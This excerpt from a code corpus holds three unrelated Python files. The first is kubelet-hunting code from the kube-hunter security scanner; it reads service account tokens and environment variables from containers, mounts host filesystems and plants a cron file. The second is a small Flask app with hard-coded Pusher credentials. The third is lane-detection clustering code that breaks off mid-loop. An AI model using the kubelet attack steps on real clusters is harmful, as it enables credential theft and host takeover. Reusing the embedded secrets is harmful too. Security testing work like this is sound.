        return r.text if r.status_code == 200 else False
    def execute(self):
        if self.event.anonymous_auth:
            self.publish_event(AnonymousAuthEnabled())
        self.pods_endpoint_data = self.get_pods_endpoint()
        healthz = self.check_healthz_endpoint()
        if self.pods_endpoint_data:
            self.publish_event(ExposedPodsHandler(pods=self.pods_endpoint_data["items"]))
        if healthz:
            self.publish_event(ExposedHealthzHandler(status=healthz))
        self.test_handlers()
    def test_handlers(self):
        """Probe each debug handler against a target pod and publish findings."""
        config = get_config()
        # if kube-hunter runs in a pod, we test with kube-hunter's pod
        pod = self.kubehunter_pod if config.pod else self.get_random_pod()
        if pod:
            debug_handlers = self.DebugHandlers(self.path, pod, self.session)
            try:
                # TODO: use named expressions, introduced in python3.8
                running_pods = debug_handlers.test_running_pods()
                if running_pods:
                    self.publish_event(ExposedRunningPodsHandler(count=len(running_pods["items"])))
                cmdline = debug_handlers.test_pprof_cmdline()
                if cmdline:
                    self.publish_event(ExposedKubeletCmdline(cmdline=cmdline))
                if debug_handlers.test_container_logs():
                    self.publish_event(ExposedContainerLogsHandler())
                if debug_handlers.test_exec_container():
                    self.publish_event(ExposedExecHandler())
                if debug_handlers.test_run_container():
                    self.publish_event(ExposedRunHandler())
                if debug_handlers.test_port_forward():
                    self.publish_event(ExposedPortForwardHandler())  # not implemented
                if debug_handlers.test_attach_container():
                    self.publish_event(ExposedAttachHandler())
                if debug_handlers.test_logs_endpoint():
                    self.publish_event(ExposedSystemLogs())
            except Exception:
                # Best-effort probing: any single failure aborts the remaining tests.
                logger.debug("Failed testing debug handlers", exc_info=True)
    # trying to get a pod from default namespace, if doesn't exist, gets a kube-system one
    def get_random_pod(self):
        if self.pods_endpoint_data:
            pods_data = self.pods_endpoint_data["items"]
            def is_default_pod(pod):
                return pod["metadata"]["namespace"] == "default" and pod["status"]["phase"] == "Running"
            def is_kubesystem_pod(pod):
                return pod["metadata"]["namespace"] == "kube-system" and pod["status"]["phase"] == "Running"
            pod_data = next(filter(is_default_pod, pods_data), None)
            if not pod_data:
                pod_data = next(filter(is_kubesystem_pod, pods_data), None)
            if pod_data:
                # Use the first container of the chosen pod.
                container_data = pod_data["spec"]["containers"][0]
                if container_data:
                    return {
                        "name": pod_data["metadata"]["name"],
                        "container": container_data["name"],
                        "namespace": pod_data["metadata"]["namespace"],
                    }
""" Active Hunters """
@handler.subscribe(AnonymousAuthEnabled)
class ProveAnonymousAuth(ActiveHunter):
    """Foothold Via Secure Kubelet Port
    Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a
    container abusing the configuration of the kubelet's secure port: authentication-auth=false.
    """
    def __init__(self, event):
        self.event = event
        self.base_url = f"https://{self.event.host}:10250/"
    def get_request(self, url, verify=False):
        """GET via the event's session; on failure return an "Exception: ..." marker string."""
        config = get_config()
        try:
            response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip()
            return response_text
        except Exception as ex:
            logging.debug("Exception: " + str(ex))
            return "Exception: " + str(ex)
    def post_request(self, url, params, verify=False):
        """POST via the event's session; on failure return an "Exception: ..." marker string."""
        config = get_config()
        try:
            response_text = self.event.session.post(
                url=url, verify=verify, params=params, timeout=config.network_timeout
            ).text.rstrip()
            return response_text
        except Exception as ex:
            logging.debug("Exception: " + str(ex))
            return "Exception: " + str(ex)
    @staticmethod
    def has_no_exception(result):
        # True when the text does not carry the "Exception: " marker set above.
        return "Exception: " not in result
    @staticmethod
    def has_no_error(result):
        # Substrings that shell command output contains on failure.
        possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"]
        return not any(error in result for error in possible_errors)
    @staticmethod
    def has_no_error_nor_exception(result):
        return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result)
    def cat_command(self, run_request_url, full_file_path):
        """Run `cat` on a file inside the container via the kubelet run handler."""
        return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
    def process_container(self, run_request_url):
        """Try to read the service account token and env from a container.

        Returns {"result": True, "service_account_token": ..., "environment_variables": ...}
        on success, else {"result": False}.
        """
        service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token")
        environment_variables = self.post_request(run_request_url, {"cmd": "env"})
        if self.has_no_error_nor_exception(service_account_token):
            return {
                "result": True,
                "service_account_token": service_account_token,
                "environment_variables": environment_variables,
            }
        return {"result": False}
    def execute(self):
        pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value)
        # At this point, the following must happen:
        # a) we get the data of the running pods
        # b) we get a forbidden message because the API server
        # has a configuration that denies anonymous attempts despite the kubelet being vulnerable
        if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw:
            pods_data = json.loads(pods_raw)["items"]
            temp_message = ""
            exposed_existing_privileged_containers = list()
            for pod_data in pods_data:
                pod_namespace = pod_data["metadata"]["namespace"]
                pod_id = pod_data["metadata"]["name"]
                for container_data in pod_data["spec"]["containers"]:
                    container_name = container_data["name"]
                    run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
                    extracted_data = self.process_container(run_request_url)
                    if extracted_data["result"]:
                        service_account_token = extracted_data["service_account_token"]
                        environment_variables = extracted_data["environment_variables"]
                        temp_message += (
                            f"\n\nPod namespace: {pod_namespace}"
                            + f"\n\nPod ID: {pod_id}"
                            + f"\n\nContainer name: {container_name}"
                            + f"\n\nService account token: {service_account_token}"
                            + f"\nEnvironment variables: {environment_variables}"
                        )
                        # Privileged if securityContext.privileged is set, or if
                        # the SYS_ADMIN capability was added.
                        first_check = container_data.get("securityContext", {}).get("privileged")
                        first_subset = container_data.get("securityContext", {})
                        second_subset = first_subset.get("capabilities", {})
                        data_for_second_check = second_subset.get("add", [])
                        second_check = "SYS_ADMIN" in data_for_second_check
                        if first_check or second_check:
                            exposed_existing_privileged_containers.append(
                                {
                                    "pod_namespace": pod_namespace,
                                    "pod_id": pod_id,
                                    "container_name": container_name,
                                    "service_account_token": service_account_token,
                                    "environment_variables": environment_variables,
                                }
                            )
            if temp_message:
                message = "The following containers have been successfully breached." + temp_message
                self.event.evidence = f"{message}"
            if exposed_existing_privileged_containers:
                self.publish_event(
                    ExposedExistingPrivilegedContainersViaSecureKubeletPort(
                        exposed_existing_privileged_containers=exposed_existing_privileged_containers
                    )
                )
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
class MaliciousIntentViaSecureKubeletPort(ActiveHunter):
    """Malicious Intent Via Secure Kubelet Port
    Attempts to demonstrate that a malicious actor can leverage existing privileged containers
    exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration,
    such that a process can be started or modified on the host.
    """
    def __init__(self, event, seconds_to_wait_for_os_command=1):
        self.event = event
        self.base_url = f"https://{self.event.host}:10250/"
        # Delay between issuing an OS command and re-checking its effect.
        self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command
        # Retry budgets for the cleanup commands (fs operations can lag).
        self.number_of_rm_attempts = 5
        self.number_of_rmdir_attempts = 5
        self.number_of_umount_attempts = 5
    def post_request(self, url, params, verify=False):
        """POST via the event's session; return the body or an "Exception: ..." marker.

        Bugfix: `verify` was previously passed positionally, which made it the
        `data` argument of Session.post and left TLS verification at its default
        (enabled) — every request against the kubelet's self-signed cert failed.
        Now passed as a keyword, matching ProveAnonymousAuth.post_request.
        """
        config = get_config()
        try:
            response_text = self.event.session.post(
                url=url, verify=verify, params=params, timeout=config.network_timeout
            ).text.rstrip()
            return response_text
        except Exception as ex:
            logging.debug("Exception: " + str(ex))
            return "Exception: " + str(ex)
    def cat_command(self, run_request_url, full_file_path):
        """Run `cat` on a file inside the target container."""
        return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
    def clean_attacked_exposed_existing_privileged_container(
        self,
        run_request_url,
        file_system_or_partition,
        directory_created,
        file_created,
        number_of_rm_attempts,
        number_of_umount_attempts,
        number_of_rmdir_attempts,
        seconds_to_wait_for_os_command,
    ):
        """Undo the attack: remove the cron file, unmount the host fs, remove the mount dir."""
        self.rm_command(
            run_request_url,
            f"{directory_created}/etc/cron.daily/{file_created}",
            number_of_rm_attempts,
            seconds_to_wait_for_os_command,
        )
        self.umount_command(
            run_request_url,
            file_system_or_partition,
            directory_created,
            number_of_umount_attempts,
            seconds_to_wait_for_os_command,
        )
        self.rmdir_command(
            run_request_url,
            directory_created,
            number_of_rmdir_attempts,
            seconds_to_wait_for_os_command,
        )
    def check_file_exists(self, run_request_url, file):
        # `ls` succeeds (no error marker) only when the file exists.
        file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file)
        return ProveAnonymousAuth.has_no_error_nor_exception(file_exists)
    def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command):
        """Attempt to delete a file, retrying; return True when it is gone."""
        if self.check_file_exists(run_request_url, file_to_remove):
            for _ in range(number_of_rm_attempts):
                command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rm -f {file_to_remove}"})
                if seconds_to_wait_for_os_command:
                    time.sleep(seconds_to_wait_for_os_command)
                first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
                second_check = self.check_file_exists(run_request_url, file_to_remove)
                if first_check and not second_check:
                    return True
            # Recover pod/container names from the run URL for the warning.
            pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
            container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
            logger.warning(
                "kube-hunter: "
                + "POD="
                + pod_id
                + ", "
                + "CONTAINER="
                + container_name
                + " - Unable to remove file: "
                + file_to_remove
            )
            return False
    def chmod_command(self, run_request_url, permissions, file):
        return self.post_request(run_request_url, {"cmd": f"chmod {permissions} {file}"})
    def touch_command(self, run_request_url, file_to_create):
        return self.post_request(run_request_url, {"cmd": f"touch {file_to_create}"})
    def attack_exposed_existing_privileged_container(
        self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None
    ):
        """Drop an executable file into the host's /etc/cron.daily via the mounted fs.

        Returns {"result": True, "file_created": name} on success, else {"result": False}.
        """
        if file_name is None:
            file_name = "kube-hunter" + str(uuid.uuid1())
        file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"
        file_created = self.touch_command(run_request_url, file_name_with_path)
        if ProveAnonymousAuth.has_no_error_nor_exception(file_created):
            permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)
            if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed):
                return {"result": True, "file_created": file_name}
        # Partial success (touched but not chmod-ed): remove the leftover file.
        self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command)
        return {"result": False}
    def check_directory_exists(self, run_request_url, directory):
        directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory)
        return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists)
    def rmdir_command(
        self,
        run_request_url,
        directory_to_remove,
        number_of_rmdir_attempts,
        seconds_to_wait_for_os_command,
    ):
        """Attempt to remove a directory, retrying; return True when it is gone."""
        if self.check_directory_exists(run_request_url, directory_to_remove):
            for _ in range(number_of_rmdir_attempts):
                command_execution_outcome = self.post_request(run_request_url, {"cmd": f"rmdir {directory_to_remove}"})
                if seconds_to_wait_for_os_command:
                    time.sleep(seconds_to_wait_for_os_command)
                first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
                second_check = self.check_directory_exists(run_request_url, directory_to_remove)
                if first_check and not second_check:
                    return True
            pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
            container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
            logger.warning(
                "kube-hunter: "
                + "POD="
                + pod_id
                + ", "
                + "CONTAINER="
                + container_name
                + " - Unable to remove directory: "
                + directory_to_remove
            )
            return False
    def ls_command(self, run_request_url, file_or_directory):
        return self.post_request(run_request_url, {"cmd": f"ls {file_or_directory}"})
    def umount_command(
        self,
        run_request_url,
        file_system_or_partition,
        directory,
        number_of_umount_attempts,
        seconds_to_wait_for_os_command,
    ):
        """Attempt to unmount, retrying; success when the directory listing changes."""
        # Note: the logic implemented proved more reliable than using "df"
        # command to resolve for mounted systems/partitions.
        current_files_and_directories = self.ls_command(run_request_url, directory)
        if self.ls_command(run_request_url, directory) == current_files_and_directories:
            for _ in range(number_of_umount_attempts):
                # Ref: http://man7.org/linux/man-pages/man2/umount.2.html
                command_execution_outcome = self.post_request(
                    run_request_url, {"cmd": f"umount {file_system_or_partition} {directory}"}
                )
                if seconds_to_wait_for_os_command:
                    time.sleep(seconds_to_wait_for_os_command)
                first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
                second_check = self.ls_command(run_request_url, directory) != current_files_and_directories
                if first_check and second_check:
                    return True
            pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
            container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
            logger.warning(
                "kube-hunter: "
                + "POD="
                + pod_id
                + ", "
                + "CONTAINER="
                + container_name
                + " - Unable to unmount "
                + file_system_or_partition
                + " at: "
                + directory
            )
            return False
    def mount_command(self, run_request_url, file_system_or_partition, directory):
        # Ref: http://man7.org/linux/man-pages/man8/mount.8.html
        return self.post_request(run_request_url, {"cmd": f"mount {file_system_or_partition} {directory}"})
    def mkdir_command(self, run_request_url, directory_to_create):
        # Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
        return self.post_request(run_request_url, {"cmd": f"mkdir {directory_to_create}"})
    def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition):
        # Ref: http://man7.org/linux/man-pages/man8/findfs.8.html
        return self.post_request(
            run_request_url, {"cmd": f"findfs {file_system_or_partition_type}{file_system_or_partition}"}
        )
    def get_root_values(self, command_line):
        """Extract the root= value (and its LABEL=/UUID= prefix, if any) from /proc/cmdline.

        Returns (root_value, root_value_type) or (None, None) when no root= is present.
        """
        for command in command_line.split(" "):
            # Check for variable-definition commands as there can be commands which don't define variables.
            if "=" in command:
                split = command.split("=")
                if split[0] == "root":
                    if len(split) > 2:
                        # Potential valid scenario: root=LABEL=example
                        root_value_type = split[1] + "="
                        root_value = split[2]
                        return root_value, root_value_type
                    else:
                        root_value_type = ""
                        root_value = split[1]
                        return root_value, root_value_type
        return None, None
    def process_exposed_existing_privileged_container(
        self,
        run_request_url,
        number_of_umount_attempts,
        number_of_rmdir_attempts,
        seconds_to_wait_for_os_command,
        directory_to_create=None,
    ):
        """Resolve the host root fs and mount it inside the container.

        On success returns {"result": True, "file_system_or_partition": ...,
        "directory_created": ...}; on any failure cleans up and returns
        {"result": False}.
        """
        if directory_to_create is None:
            directory_to_create = "/kube-hunter_" + str(uuid.uuid1())
        # /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started.
        command_line = self.cat_command(run_request_url, "/proc/cmdline")
        if ProveAnonymousAuth.has_no_error_nor_exception(command_line):
            if len(command_line.split(" ")) > 0:
                root_value, root_value_type = self.get_root_values(command_line)
                # Move forward only when the "root" variable value was actually defined.
                if root_value:
                    if root_value_type:
                        # root=LABEL=x / root=UUID=x: resolve to a device via findfs.
                        file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value)
                    else:
                        file_system_or_partition = root_value
                    if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition):
                        directory_created = self.mkdir_command(run_request_url, directory_to_create)
                        if ProveAnonymousAuth.has_no_error_nor_exception(directory_created):
                            directory_created = directory_to_create
                            mounted_file_system_or_partition = self.mount_command(
                                run_request_url, file_system_or_partition, directory_created
                            )
                            if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition):
                                # Reading the host's /etc/hostname confirms the mount worked.
                                host_name = self.cat_command(run_request_url, f"{directory_created}/etc/hostname")
                                if ProveAnonymousAuth.has_no_error_nor_exception(host_name):
                                    return {
                                        "result": True,
                                        "file_system_or_partition": file_system_or_partition,
                                        "directory_created": directory_created,
                                    }
                                self.umount_command(
                                    run_request_url,
                                    file_system_or_partition,
                                    directory_created,
                                    number_of_umount_attempts,
                                    seconds_to_wait_for_os_command,
                                )
                            self.rmdir_command(
                                run_request_url,
                                directory_created,
                                number_of_rmdir_attempts,
                                seconds_to_wait_for_os_command,
                            )
        return {"result": False}
    def execute(self, directory_to_create=None, file_name=None):
        temp_message = ""
        for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers:
            pod_namespace = exposed_existing_privileged_containers["pod_namespace"]
            pod_id = exposed_existing_privileged_containers["pod_id"]
            container_name = exposed_existing_privileged_containers["container_name"]
            run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
            is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container(
                run_request_url,
                self.number_of_umount_attempts,
                self.number_of_rmdir_attempts,
                self.seconds_to_wait_for_os_command,
                directory_to_create,
            )
            if is_exposed_existing_privileged_container_privileged["result"]:
                file_system_or_partition = is_exposed_existing_privileged_container_privileged[
                    "file_system_or_partition"
                ]
                directory_created = is_exposed_existing_privileged_container_privileged["directory_created"]
                # Execute attack attempt: start/modify process in host.
                attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container(
                    run_request_url,
                    directory_created,
                    self.number_of_rm_attempts,
                    self.seconds_to_wait_for_os_command,
                    file_name,
                )
                if attack_successful_on_exposed_privileged_container["result"]:
                    file_created = attack_successful_on_exposed_privileged_container["file_created"]
                    self.clean_attacked_exposed_existing_privileged_container(
                        run_request_url,
                        file_system_or_partition,
                        directory_created,
                        file_created,
                        self.number_of_rm_attempts,
                        self.number_of_umount_attempts,
                        self.number_of_rmdir_attempts,
                        self.seconds_to_wait_for_os_command,
                    )
                    temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format(
                        pod_namespace, pod_id, container_name
                    )
        if temp_message:
            message = (
                "The following exposed existing privileged containers"
                + " have been successfully abused by starting/modifying a process in the host."
                + temp_message
            )
            self.event.evidence = f"{message}"
        else:
            message = (
                "The following exposed existing privileged containers"
                + " were not successfully abused by starting/modifying a process in the host."
                + "Keep in mind that attackers might use other methods to attempt to abuse them."
                + temp_message
            )
            self.event.evidence = f"{message}"
@handler.subscribe(ExposedRunHandler)
class ProveRunHandler(ActiveHunter):
    """Kubelet Run Hunter
    Executes uname inside of a random container
    """
    def __init__(self, event):
        self.event = event
        self.base_path = f"https://{self.event.host}:{self.event.port}"
    def run(self, command, container):
        """POST the given command to the kubelet run handler for `container`."""
        config = get_config()
        handler_path = KubeletHandlers.RUN.value.format(
            pod_namespace=container["namespace"],
            pod_id=container["pod"],
            container_name=container["name"],
            cmd=command,
        )
        response = self.event.session.post(
            f"{self.base_path}/{handler_path}",
            verify=False,
            timeout=config.network_timeout,
        )
        return response.text
    def execute(self):
        config = get_config()
        response = self.event.session.get(
            f"{self.base_path}/" + KubeletHandlers.PODS.value,
            verify=False,
            timeout=config.network_timeout,
        )
        if "items" not in response.text:
            return
        # Try each pod's first container until one executes the command cleanly.
        for pod in response.json()["items"]:
            first_container = pod["spec"]["containers"][0]
            if not first_container:
                continue
            output = self.run(
                "uname -a",
                container={
                    "namespace": pod["metadata"]["namespace"],
                    "pod": pod["metadata"]["name"],
                    "name": first_container["name"],
                },
            )
            if output and "exited with" not in output:
                self.event.evidence = "uname -a: " + output
                break
@handler.subscribe(ExposedContainerLogsHandler)
class ProveContainerLogsHandler(ActiveHunter):
    """Kubelet Container Logs Hunter
    Retrieves logs from a random container
    """
    def __init__(self, event):
        self.event = event
        # Port 10250 is the secured kubelet API; anything else is assumed to be
        # the read-only HTTP port.
        protocol = "https" if self.event.port == 10250 else "http"
        self.base_url = f"{protocol}://{self.event.host}:{self.event.port}/"
    def execute(self):
        """Fetch logs from the first container of the first pod that yields any."""
        config = get_config()
        pods_raw = self.event.session.get(
            self.base_url + KubeletHandlers.PODS.value,
            verify=False,
            timeout=config.network_timeout,
        ).text
        if "items" not in pods_raw:
            return
        for pod_data in json.loads(pods_raw)["items"]:
            container_data = pod_data["spec"]["containers"][0]
            if not container_data:
                continue
            container_name = container_data["name"]
            # BUGFIX: base_url already ends with "/", so the handler path is
            # appended directly (previously an extra "/" produced a "//" URL),
            # and the shared event session is used instead of a bare
            # requests.get, consistent with the other hunters in this file.
            output = self.event.session.get(
                self.base_url
                + KubeletHandlers.CONTAINERLOGS.value.format(
                    pod_namespace=pod_data["metadata"]["namespace"],
                    pod_id=pod_data["metadata"]["name"],
                    container_name=container_name,
                ),
                verify=False,
                timeout=config.network_timeout,
            )
            if output.status_code == 200 and output.text:
                self.event.evidence = f"{container_name}: {output.text}"
                return
@handler.subscribe(ExposedSystemLogs)
class ProveSystemLogs(ActiveHunter):
    """Kubelet System Logs Hunter
    Retrieves commands from host's system audit
    """
    def __init__(self, event):
        self.event = event
        self.base_url = f"https://{self.event.host}:{self.event.port}"
    def execute(self):
        config = get_config()
        logs_url = f"{self.base_url}/" + KubeletHandlers.LOGS.value.format(path="audit/audit.log")
        audit_logs = self.event.session.get(
            logs_url,
            verify=False,
            timeout=config.network_timeout,
        )
        # TODO: add more methods for proving system logs
        if audit_logs.status_code != requests.status_codes.codes.OK:
            self.event.evidence = "Could not parse system logs"
            return
        logger.debug(f"Audit log of host {self.event.host}: {audit_logs.text[:10]}")
        # audit proctitle entries are hex-encoded argv strings joined by NUL
        # bytes; decode each one into a readable command line
        proctitles = [
            bytes.fromhex(encoded).decode("utf-8").replace("\x00", " ")
            for encoded in re.findall(r"proctitle=(\w+)", audit_logs.text)
        ]
        self.event.proctitles = proctitles
        self.event.evidence = f"audit log: {proctitles}"
| StarcoderdataPython |
1998882 | <filename>realtime-feed/app.py<gh_stars>0
# ./app.py
from flask import Flask, render_template, request, jsonify
from pusher import Pusher
import uuid
# create flask app
app = Flask(__name__)
# configure pusher object
# SECURITY NOTE(review): Pusher credentials are hard-coded in source control;
# load app_id/key/secret from environment variables (e.g. os.environ) instead
# of committing them, and rotate these keys since they are now public.
pusher = Pusher(
    app_id='526937',
    key='00e43de0549d95ef2e5f',
    secret='9f555fe422de52f88f26',
    cluster='eu',
    ssl=True
)
# index route
@app.route('/')
def index():
    """Render the index page (templates/index.html)."""
    return render_template('index.html')
# feed route
@app.route('/feed')
def feed():
    """Render the feed page (templates/feed.html)."""
    return render_template('feed.html')
# store post
@app.route('/post', methods=['POST'])
def addPost():
    """Create a post from the submitted form and broadcast a 'post-added'
    Pusher event on the "blog" channel; echoes the payload back as JSON."""
    new_post = dict(
        id="post-{}".format(uuid.uuid4().hex),
        title=request.form.get('title'),
        content=request.form.get('content'),
        status='active',
        event_name='created',
    )
    pusher.trigger("blog", "post-added", new_post)
    return jsonify(new_post)
# deactivate or delete post
@app.route('/post/<id>', methods=['PUT', 'DELETE'])
def updatePost(id):
    """Broadcast deletion (DELETE) or deactivation (any other allowed method,
    i.e. PUT) of the given post id, and echo the event payload as JSON."""
    deleting = request.method == 'DELETE'
    data = {'id': id, 'event_name': 'deleted' if deleting else 'deactivated'}
    pusher.trigger("blog", "post-deleted" if deleting else "post-deactivated", data)
    return jsonify(data)
# run flask app in debug mode
# BUGFIX: guarded so importing this module (e.g. from a WSGI server or a test)
# does not start the development server as a side effect.
# NOTE: debug=True enables the interactive debugger; never use it in production.
if __name__ == '__main__':
    app.run(debug=True)
| StarcoderdataPython |
4951265 | from typing import List, Tuple, Optional
import math
import numpy as np
from itertools import product
from queue import PriorityQueue
from abc import abstractmethod
from itertools import chain
from pprint import pprint
import logging
from lane_detection.segment import Segment
# Configure logging should be moved
logging.basicConfig(filename="utils.log", level=logging.DEBUG)
class Mergeable:
    """A helper class to contain merged nodes indexed by the sorted tuple of original indices"""
    def __init__(self, id_: Tuple[int]):
        # Identifier of the merged node: a tuple of original item indices.
        # Insertion order is preserved (the merge order matters for compute()).
        self._id = id_ # tuple(sorted(list(id_))) # tuple merged (the order matters)
    def __repr__(self):
        return str(self._id)
    def __hash__(self):
        # Hash formed by concatenating the sorted indices as decimal digits,
        # making it order-insensitive.
        # NOTE(review): distinct ids can collide (e.g. (1, 10) and (11, 0) both
        # yield 110), and no matching __eq__ is defined so equality stays
        # identity-based — confirm this is intended before using instances as
        # dict/set keys.
        return int("".join(map(str, sorted(self._id))))
    def cache(self, store: dict):
        """Compute the merge and store it"""
        # NOTE(review): not implemented yet — currently a no-op returning None.
    def retrieve(self, store) -> Optional["Mergeable"]:
        """Retrieves the merge from a store"""
        # Lookup is keyed on the raw (order-preserving) id tuple.
        return store.get(self._id, None)
    @abstractmethod
    def compute(self, cache: Optional[dict] = None, update=False):
        """Compute the merge using optionally a store/cache"""
class SegmentCluster(Mergeable):
    """A cluster of segments, identified by the tuple of indices of its
    members in the original data list (merge order preserved)."""
    def __init__(self, id_: Tuple[int], data: Optional[List[Segment]] = None):
        """
        :param id_: tuple of indices of the member segments.
        :param data: the original list of segments the indices refer to.

        BUGFIX: the parameter was previously declared as ``data=List[Segment]``,
        i.e. the ``typing.List[Segment]`` object was the *default value* rather
        than an annotation; it is now a proper annotation with a ``None``
        default.
        """
        super().__init__(id_)
        self.__data = data
        self._logger = logging.getLogger(__name__)  # init logger
    def compute(self, cache: Optional[dict] = None, update=False):
        """Compute a segment merge from original container and a cache
        :cache: a cache/storing precomputed merge
        :param update: update the cache with the newly computed items.
        """
        self._logger.debug(self._id)
        if cache and self._id in cache:
            return cache[self._id]
        # Base case: a singleton cluster is just the original segment.
        if len(self._id) == 1:
            return self.__data[self._id[0]]
        # Recursive case: merge the prefix cluster (all but the last index)
        # with the last member segment; intermediate merges may be cached.
        output = (
            SegmentCluster(self._id[:-1], data=self.__data)
            .compute(cache, update=update)
            .merge(self.__data[self._id[-1]])
        )
        if update:
            cache[self._id] = output
        return output
    def sim(
        self,
        other: "SegmentCluster",
        similarity="cosine",
        merge=True,
        linkage=np.min,
        cache: Optional[dict] = None,
    ):
        """A helper to compute similarity between two Segment clusters
        using element-wise-similarity/or merged
        :param other: The segment cluster with which we want compute the similarity
        :param merge: Merge the cluster to one segment before
        :param linkage: The type of aggregation of individual similarity.
        :param cache: optional cache of precomputed merges (currently unused).

        BUGFIX: ``cache`` previously defaulted to a shared mutable ``{}``;
        it now defaults to ``None`` (it was never read in this method).
        NOTE(review): with ``merge=False`` this method currently returns None —
        the linkage-based path is still a TODO.
        """
        if merge:
            # Merge/interpolate/average the segment cluster into one segment
            # before applying the similarity.
            return self.compute().sim(other.compute(), similarity=similarity)
        else:
            # TODO: (optionally) use the linkage function to compute similarity
            # between the two clusters instead of the merged/extended segment.
            pass
class SimContainer:
    """A helper class that contains similar items for fast retrieval"""
    def __init__(self, item):
        self.__item = item              # the reference item similarities relate to
        self.__queue = PriorityQueue()  # entries: (1/similarity, key, similarity)
        self.__best = None              # cached entry with the highest similarity
        self._similar = set()  # keeps track of similar items
        self._removed = set()  # keeps track of the removed keys/items
    def __repr__(self):
        parts = []
        if self.__best:
            parts.append(str(self.__best))
        parts.append(str(self.__queue.queue))
        return "".join(parts)
    def put(self, similar, similarity):
        """Put a similar item in the container
        :param similar: a similar item (hashable) or a key
        :param similarity: a non zero similarity to the container self._item
        """
        self._removed.discard(similar)
        self._similar.add(similar)
        self.__queue.put((1 / similarity, similar, similarity))
        if self.__best:
            # put the cached best back so it competes with the new entry
            self.__queue.put(self.__best)
        candidate = self.__queue.get()
        while candidate[1] in self._removed:
            # skip stale entries belonging to removed keys
            candidate = self.__queue.get()
        self.__best = candidate
    def remove(self, key):
        """A helper to remove an item from the container (only by key)"""
        if key not in self._similar:
            return
        self._similar.remove(key)
        self._removed.add(key)
        # refresh the cached best entry if it just became invalid
        while self.__best and self.__best[1] in self._removed:
            if self.__queue.empty():
                self.__best = None
            else:
                self.__best = self.__queue.get()
    def best(self):
        """return the best similarity in this container"""
        return self.__best
    @property
    def queue(self):
        """return the queue."""
        return self.__queue.queue
    @property
    def similar(self):
        """Keys of the currently valid similar items, best one first."""
        if self.__best is None:
            return []
        pending = [
            entry[1]
            for entry in self.__queue.queue
            if entry[1] not in self._removed
        ]
        return [self.__best[1]] + pending
def agglomerate(
    data: List[Segment], threshold: float, similarity="cosine"
) -> Tuple[dict, dict]:
    """Agglomerate data item given
    using agglomerative-clustering (grouping the closest cluster first)
    (todo: simultaneous grouping before updating the)
    :param threshold: similarity threshold above which 2 items
    are considered similar and could be merged
    :param similarity: The similarity measure between 2 segments
    :return: Tuple/Couple of clusters' dictionary where the keys are the cluster identified by the index of the item in the original data
    the `data` parameter and the values are the similar item non yet merged/will not because the similarity with these items is below the
    `threshold` parameter. And the store of computed merged segment of the cluster and the intermediate merges that lead to the final
    returned clusters.
    """
    logger = logging.getLogger(__name__)
    def get_merge_candidates(sim_dict):
        """a helper to get candidates to merge"""
        # Rank every cluster by its best (highest-similarity) neighbour and
        # return (best_entry, cluster_key) for the overall winner, or
        # (None, None) when nothing is left to merge.
        pq_ = PriorityQueue()
        for key, value in sim_dict.items():
            best = value.best()  # get best item from the SimContainer (value)
            if best:
                pq_.put((best, key))
        if pq_.empty():
            return None, None
        else:
            return pq_.get()
    # Build the similarity between
    # Each original item starts as its own singleton cluster keyed by (index,).
    data_dict = {}  # a dictionary
    for index, item in enumerate(data):
        data_dict[(index,)] = item
    # Sorted segment by length (from the longest to the shortest segment)
    # to prioritize the segments to be merged (short or long ones)
    segments = sorted(
        [(key, segment) for key, segment in data_dict.items()],
        key=lambda x: x[1].norm,
        reverse=True,
    )
    # populate similarities (Matrix as a dictionary)
    similarities = {}
    for i in range(len(segments)):
        # similarities.
        key_i, segment_i = segments[i]
        similarities[key_i] = SimContainer(segment_i)
        # NOTE(review): the inner loop starts at 1 rather than i + 1, so for
        # i >= 1 each container also receives the similarity of a segment with
        # itself (j == i) — confirm whether this is intended.
        for j in range(1, len(segments)):
            key_j, segment_j = segments[j]
